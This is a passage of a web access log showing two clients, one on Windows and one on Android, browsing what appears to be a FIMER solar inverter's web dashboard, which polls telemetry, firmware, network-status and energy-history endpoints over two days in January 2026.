Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/connectivity-check" [Client 84.1.26.27] [Length 130] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 84.1.26.27] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 84.1.26.27] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:33 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1684] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:34 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 84.1.26.27] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:34 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 84.1.26.27] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:38 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:38 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:38 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:38 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1678] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:38 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:41 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/fa-regular-400.woff2" [Client 84.1.26.27] [Length 13224] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[13/Jan/2026:08:21:41 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Light.ttf" [Client 84.1.26.27] [Length 42142] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[13/Jan/2026:08:21:41 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1685] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:41 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768345199999&bin=week_of_year&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:41 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:41 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768345199999&bin=month_of_year&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:41 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768345199999&bin=yearly&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:42 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 84.1.26.27] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:42 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:42 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 84.1.26.27] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 84.1.26.27] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 84.1.26.27] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:48 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 84.1.26.27] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:00 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.47.86] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:00 +0000] - 404 404 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.47.86] [Length 181] [Gzip 3.22] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:00 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:00 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.47.86] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.47.86] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.47.86] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1680] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 37.76.47.86] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.47.86] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 37.76.47.86] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.47.86] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.47.86] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.47.86] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:02 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:02 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.47.86] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:04 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.47.86] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1684] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/grid_power_ctrl/obj/max_abs_active_power?scope=setting" [Client 37.76.47.86] [Length 22] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/modbus_device_monitor/device/list" [Client 37.76.47.86] [Length 180] [Gzip 3.24] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 204 204 - GET http fimer.profibot.hu "/v1/elc/config" [Client 37.76.47.86] [Length 0] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/measures" [Client 37.76.47.86] [Length 338] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/private/setup" [Client 37.76.47.86] [Length 111] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.47.86] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768431599999&bin=week_of_year&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768431599999&bin=month_of_year&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768431599999&bin=yearly&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:07 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 37.76.47.86] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:07 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.47.86] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:11 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1684] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:11 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:12 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/fa-regular-400.woff2" [Client 37.76.47.86] [Length 13224] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[14/Jan/2026:07:36:12 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Light.ttf" [Client 37.76.47.86] [Length 42142] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[14/Jan/2026:07:36:13 +0000] - 200 200 - GET http 